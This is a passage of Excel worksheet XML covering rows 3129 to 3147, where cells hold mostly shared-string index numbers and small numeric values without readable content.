      <c r="U3129" s="12" t="s">
        <v>21057</v>
      </c>
      <c r="V3129" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W3129" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3129" s="12">
        <v>1</v>
      </c>
      <c r="Y3129" s="12" t="s">
        <v>21058</v>
      </c>
    </row>
    <row r="3130" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3130" s="12">
        <v>14635</v>
      </c>
      <c r="B3130" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C3130" s="12" t="s">
        <v>30493</v>
      </c>
      <c r="D3130" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="F3130" s="12" t="s">
        <v>30494</v>
      </c>
      <c r="G3130" s="12" t="s">
        <v>21059</v>
      </c>
      <c r="H3130" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3130" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3130" s="12" t="s">
        <v>403</v>
      </c>
      <c r="K3130" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3130" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3130" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3130" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3130" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3130" s="12" t="s">
        <v>8670</v>
      </c>
      <c r="Q3130" s="12" t="s">
        <v>28300</v>
      </c>
      <c r="R3130" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3130" s="12" t="s">
        <v>21060</v>
      </c>
      <c r="T3130" s="12" t="s">
        <v>21061</v>
      </c>
      <c r="U3130" s="12" t="s">
        <v>21062</v>
      </c>
      <c r="V3130" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W3130" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3130" s="12">
        <v>0</v>
      </c>
      <c r="Y3130" s="12" t="s">
        <v>21063</v>
      </c>
    </row>
    <row r="3131" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3131" s="12">
        <v>14642</v>
      </c>
      <c r="B3131" s="12" t="s">
        <v>31330</v>
      </c>
      <c r="D3131" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3131" s="12" t="s">
        <v>31494</v>
      </c>
      <c r="F3131" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3131" s="12" t="s">
        <v>21064</v>
      </c>
      <c r="H3131" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3131" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3131" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3131" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3131" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M3131" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N3131" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O3131" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3131" s="12" t="s">
        <v>21065</v>
      </c>
      <c r="Q3131" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3131" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3131" s="12" t="s">
        <v>21066</v>
      </c>
      <c r="T3131" s="12" t="s">
        <v>21067</v>
      </c>
      <c r="U3131" s="12" t="s">
        <v>21068</v>
      </c>
      <c r="V3131" s="12" t="s">
        <v>17009</v>
      </c>
      <c r="W3131" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3131" s="12">
        <v>3</v>
      </c>
      <c r="Y3131" s="12" t="s">
        <v>21069</v>
      </c>
    </row>
    <row r="3132" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3132" s="12">
        <v>14644</v>
      </c>
      <c r="B3132" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C3132" s="12" t="s">
        <v>30516</v>
      </c>
      <c r="D3132" s="12" t="s">
        <v>30554</v>
      </c>
      <c r="F3132" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3132" s="12" t="s">
        <v>21070</v>
      </c>
      <c r="H3132" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3132" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3132" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K3132" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3132" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3132" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3132" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3132" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3132" s="12" t="s">
        <v>21071</v>
      </c>
      <c r="Q3132" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3132" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3132" s="12" t="s">
        <v>21072</v>
      </c>
      <c r="T3132" s="12" t="s">
        <v>21073</v>
      </c>
      <c r="U3132" s="12" t="s">
        <v>21074</v>
      </c>
      <c r="V3132" s="12" t="s">
        <v>8682</v>
      </c>
      <c r="W3132" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3132" s="12">
        <v>3</v>
      </c>
      <c r="Y3132" s="12" t="s">
        <v>21075</v>
      </c>
    </row>
    <row r="3133" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3133" s="12">
        <v>14645</v>
      </c>
      <c r="B3133" s="12" t="s">
        <v>31330</v>
      </c>
      <c r="D3133" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3133" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3133" s="12" t="s">
        <v>21076</v>
      </c>
      <c r="H3133" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3133" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3133" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3133" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3133" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3133" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3133" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3133" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3133" s="12" t="s">
        <v>21077</v>
      </c>
      <c r="Q3133" s="12" t="s">
        <v>28313</v>
      </c>
      <c r="R3133" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3133" s="12" t="s">
        <v>21078</v>
      </c>
      <c r="T3133" s="12" t="s">
        <v>21079</v>
      </c>
      <c r="U3133" s="12" t="s">
        <v>21080</v>
      </c>
      <c r="V3133" s="12" t="s">
        <v>21040</v>
      </c>
      <c r="W3133" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3133" s="12">
        <v>3</v>
      </c>
      <c r="Y3133" s="12" t="s">
        <v>21081</v>
      </c>
    </row>
    <row r="3134" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3134" s="12">
        <v>14658</v>
      </c>
      <c r="B3134" s="12" t="s">
        <v>30865</v>
      </c>
      <c r="D3134" s="12" t="s">
        <v>30868</v>
      </c>
      <c r="E3134" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F3134" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3134" s="12" t="s">
        <v>21082</v>
      </c>
      <c r="H3134" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3134" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3134" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K3134" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3134" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3134" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3134" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3134" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3134" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="Q3134" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3134" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3134" s="12" t="s">
        <v>21083</v>
      </c>
      <c r="T3134" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3134" s="12" t="s">
        <v>21084</v>
      </c>
      <c r="V3134" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W3134" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3134" s="12">
        <v>6</v>
      </c>
      <c r="Y3134" s="12" t="s">
        <v>21085</v>
      </c>
    </row>
    <row r="3135" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3135" s="12">
        <v>14667</v>
      </c>
      <c r="B3135" s="12" t="s">
        <v>30433</v>
      </c>
      <c r="C3135" s="12" t="s">
        <v>30434</v>
      </c>
      <c r="D3135" s="12" t="s">
        <v>30427</v>
      </c>
      <c r="E3135" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3135" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3135" s="12" t="s">
        <v>21086</v>
      </c>
      <c r="H3135" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3135" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3135" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K3135" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3135" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3135" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3135" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3135" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3135" s="12" t="s">
        <v>21087</v>
      </c>
      <c r="Q3135" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3135" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3135" s="12" t="s">
        <v>21088</v>
      </c>
      <c r="T3135" s="12" t="s">
        <v>21089</v>
      </c>
      <c r="U3135" s="12" t="s">
        <v>21090</v>
      </c>
      <c r="V3135" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W3135" s="12" t="s">
        <v>21091</v>
      </c>
      <c r="X3135" s="12">
        <v>100</v>
      </c>
      <c r="Y3135" s="12" t="s">
        <v>21092</v>
      </c>
    </row>
    <row r="3136" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3136" s="12">
        <v>14668</v>
      </c>
      <c r="B3136" s="12" t="s">
        <v>30058</v>
      </c>
      <c r="C3136" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D3136" s="12" t="s">
        <v>30048</v>
      </c>
      <c r="E3136" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3136" s="12" t="s">
        <v>30059</v>
      </c>
      <c r="G3136" s="12" t="s">
        <v>21093</v>
      </c>
      <c r="H3136" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3136" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3136" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K3136" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3136" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3136" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3136" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3136" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3136" s="12" t="s">
        <v>21087</v>
      </c>
      <c r="Q3136" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3136" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3136" s="12" t="s">
        <v>21094</v>
      </c>
      <c r="T3136" s="12" t="s">
        <v>20364</v>
      </c>
      <c r="U3136" s="12" t="s">
        <v>21095</v>
      </c>
      <c r="V3136" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W3136" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3136" s="12">
        <v>63</v>
      </c>
      <c r="Y3136" s="12" t="s">
        <v>21096</v>
      </c>
    </row>
    <row r="3137" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3137" s="12">
        <v>14670</v>
      </c>
      <c r="B3137" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3137" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3137" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3137" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3137" s="12" t="s">
        <v>21097</v>
      </c>
      <c r="H3137" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3137" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3137" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3137" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3137" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3137" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3137" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3137" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3137" s="12" t="s">
        <v>21098</v>
      </c>
      <c r="Q3137" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3137" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3137" s="12" t="s">
        <v>21099</v>
      </c>
      <c r="T3137" s="12" t="s">
        <v>10811</v>
      </c>
      <c r="U3137" s="12" t="s">
        <v>21100</v>
      </c>
      <c r="V3137" s="12" t="s">
        <v>8133</v>
      </c>
      <c r="W3137" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3137" s="12">
        <v>32</v>
      </c>
      <c r="Y3137" s="12" t="s">
        <v>21101</v>
      </c>
    </row>
    <row r="3138" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3138" s="12">
        <v>14686</v>
      </c>
      <c r="B3138" s="12" t="s">
        <v>31097</v>
      </c>
      <c r="D3138" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3138" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3138" s="12" t="s">
        <v>21108</v>
      </c>
      <c r="H3138" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3138" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3138" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3138" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3138" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3138" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3138" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3138" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3138" s="12" t="s">
        <v>21109</v>
      </c>
      <c r="Q3138" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3138" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3138" s="12" t="s">
        <v>21110</v>
      </c>
      <c r="T3138" s="12" t="s">
        <v>21111</v>
      </c>
      <c r="U3138" s="12" t="s">
        <v>21112</v>
      </c>
      <c r="V3138" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3138" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3138" s="12">
        <v>9</v>
      </c>
      <c r="Y3138" s="12" t="s">
        <v>21113</v>
      </c>
    </row>
    <row r="3139" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3139" s="12">
        <v>14691</v>
      </c>
      <c r="B3139" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C3139" s="12" t="s">
        <v>30516</v>
      </c>
      <c r="D3139" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3139" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3139" s="12" t="s">
        <v>30554</v>
      </c>
      <c r="G3139" s="12" t="s">
        <v>21114</v>
      </c>
      <c r="H3139" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3139" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3139" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K3139" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3139" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M3139" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N3139" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O3139" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3139" s="12" t="s">
        <v>21087</v>
      </c>
      <c r="Q3139" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3139" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3139" s="12" t="s">
        <v>21115</v>
      </c>
      <c r="T3139" s="12" t="s">
        <v>1205</v>
      </c>
      <c r="U3139" s="12" t="s">
        <v>21116</v>
      </c>
      <c r="V3139" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W3139" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3139" s="12">
        <v>4</v>
      </c>
      <c r="Y3139" s="12" t="s">
        <v>21117</v>
      </c>
    </row>
    <row r="3140" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3140" s="12">
        <v>14700</v>
      </c>
      <c r="B3140" s="12" t="s">
        <v>30167</v>
      </c>
      <c r="D3140" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3140" s="12" t="s">
        <v>31544</v>
      </c>
      <c r="F3140" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3140" s="12" t="s">
        <v>21118</v>
      </c>
      <c r="H3140" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3140" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3140" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K3140" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3140" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3140" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3140" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3140" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3140" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="Q3140" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3140" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3140" s="12" t="s">
        <v>21119</v>
      </c>
      <c r="T3140" s="12" t="s">
        <v>21120</v>
      </c>
      <c r="U3140" s="12" t="s">
        <v>21121</v>
      </c>
      <c r="V3140" s="12" t="s">
        <v>4562</v>
      </c>
      <c r="W3140" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3140" s="12">
        <v>7</v>
      </c>
      <c r="Y3140" s="12" t="s">
        <v>21122</v>
      </c>
    </row>
    <row r="3141" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3141" s="12">
        <v>14709</v>
      </c>
      <c r="B3141" s="12" t="s">
        <v>30060</v>
      </c>
      <c r="C3141" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D3141" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3141" s="12" t="s">
        <v>30061</v>
      </c>
      <c r="G3141" s="12" t="s">
        <v>21127</v>
      </c>
      <c r="H3141" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3141" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3141" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K3141" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3141" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3141" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3141" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3141" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3141" s="12" t="s">
        <v>20848</v>
      </c>
      <c r="Q3141" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3141" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3141" s="12" t="s">
        <v>21128</v>
      </c>
      <c r="T3141" s="12" t="s">
        <v>10945</v>
      </c>
      <c r="U3141" s="12" t="s">
        <v>21129</v>
      </c>
      <c r="V3141" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W3141" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3141" s="12">
        <v>9</v>
      </c>
      <c r="Y3141" s="12" t="s">
        <v>21130</v>
      </c>
    </row>
    <row r="3142" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3142" s="12">
        <v>14716</v>
      </c>
      <c r="B3142" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C3142" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D3142" s="12" t="s">
        <v>30326</v>
      </c>
      <c r="E3142" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3142" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3142" s="12" t="s">
        <v>21137</v>
      </c>
      <c r="H3142" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3142" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3142" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3142" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3142" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3142" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3142" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3142" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3142" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="Q3142" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3142" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3142" s="12" t="s">
        <v>21138</v>
      </c>
      <c r="T3142" s="12" t="s">
        <v>21139</v>
      </c>
      <c r="U3142" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V3142" s="12" t="s">
        <v>8941</v>
      </c>
      <c r="W3142" s="12">
        <v>15975</v>
      </c>
      <c r="X3142" s="12">
        <v>34</v>
      </c>
      <c r="Y3142" s="12" t="s">
        <v>21140</v>
      </c>
    </row>
    <row r="3143" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3143" s="12">
        <v>14722</v>
      </c>
      <c r="B3143" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3143" s="12" t="s">
        <v>30721</v>
      </c>
      <c r="E3143" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3143" s="12" t="s">
        <v>30736</v>
      </c>
      <c r="G3143" s="12" t="s">
        <v>21141</v>
      </c>
      <c r="H3143" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3143" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3143" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3143" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3143" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3143" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3143" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3143" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3143" s="12" t="s">
        <v>7765</v>
      </c>
      <c r="Q3143" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3143" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3143" s="12" t="s">
        <v>21142</v>
      </c>
      <c r="T3143" s="12" t="s">
        <v>11112</v>
      </c>
      <c r="U3143" s="12" t="s">
        <v>21143</v>
      </c>
      <c r="V3143" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3143" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3143" s="12">
        <v>8</v>
      </c>
      <c r="Y3143" s="12" t="s">
        <v>21144</v>
      </c>
    </row>
    <row r="3144" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3144" s="12">
        <v>14730</v>
      </c>
      <c r="B3144" s="12" t="s">
        <v>30464</v>
      </c>
      <c r="C3144" s="12" t="s">
        <v>30495</v>
      </c>
      <c r="D3144" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3144" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3144" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3144" s="12" t="s">
        <v>21151</v>
      </c>
      <c r="H3144" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3144" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3144" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K3144" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3144" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3144" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3144" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3144" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3144" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q3144" s="12" t="s">
        <v>28315</v>
      </c>
      <c r="R3144" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3144" s="12" t="s">
        <v>21152</v>
      </c>
      <c r="T3144" s="12" t="s">
        <v>21153</v>
      </c>
      <c r="U3144" s="12" t="s">
        <v>21154</v>
      </c>
      <c r="V3144" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W3144" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3144" s="12">
        <v>48</v>
      </c>
      <c r="Y3144" s="12" t="s">
        <v>21155</v>
      </c>
    </row>
    <row r="3145" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3145" s="12">
        <v>14733</v>
      </c>
      <c r="B3145" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3145" s="12" t="s">
        <v>30721</v>
      </c>
      <c r="E3145" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3145" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3145" s="12" t="s">
        <v>21156</v>
      </c>
      <c r="H3145" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3145" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3145" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K3145" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L3145" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3145" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3145" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3145" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3145" s="12" t="s">
        <v>28280</v>
      </c>
      <c r="R3145" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3145" s="12" t="s">
        <v>21157</v>
      </c>
      <c r="T3145" s="12" t="s">
        <v>21158</v>
      </c>
      <c r="U3145" s="12" t="s">
        <v>21159</v>
      </c>
      <c r="V3145" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W3145" s="12" t="s">
        <v>21161</v>
      </c>
      <c r="X3145" s="12">
        <v>105</v>
      </c>
      <c r="Y3145" s="12" t="s">
        <v>21162</v>
      </c>
    </row>
    <row r="3146" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3146" s="12">
        <v>14736</v>
      </c>
      <c r="B3146" s="12" t="s">
        <v>31103</v>
      </c>
      <c r="C3146" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D3146" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3146" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3146" s="12" t="s">
        <v>31102</v>
      </c>
      <c r="G3146" s="12" t="s">
        <v>21163</v>
      </c>
      <c r="H3146" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3146" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3146" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K3146" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3146" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3146" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3146" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3146" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3146" s="12" t="s">
        <v>21164</v>
      </c>
      <c r="Q3146" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3146" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3146" s="12" t="s">
        <v>21165</v>
      </c>
      <c r="T3146" s="12" t="s">
        <v>21166</v>
      </c>
      <c r="U3146" s="12" t="s">
        <v>21167</v>
      </c>
      <c r="V3146" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W3146" s="12">
        <v>12873</v>
      </c>
      <c r="X3146" s="12">
        <v>18</v>
      </c>
      <c r="Y3146" s="12" t="s">
        <v>21168</v>
      </c>
    </row>
    <row r="3147" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3147" s="12">
        <v>14742</v>
      </c>
      <c r="B3147" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3147" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3147" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F3147" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3147" s="12" t="s">
        <v>21169</v>
      </c>
      <c r="H3147" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3147" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3147" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3147" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3147" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3147" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3147" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3147" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3147" s="12" t="s">
        <v>7765</v>
      </c>
      <c r="Q3147" s="12" t="s">
        <v>28317</v>
      </c>
      <c r="R3147" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3147" s="12" t="s">
        <v>21170</v>
      </c>
      <c r="T3147" s="12" t="s">
        <v>21171</v>
      </c>
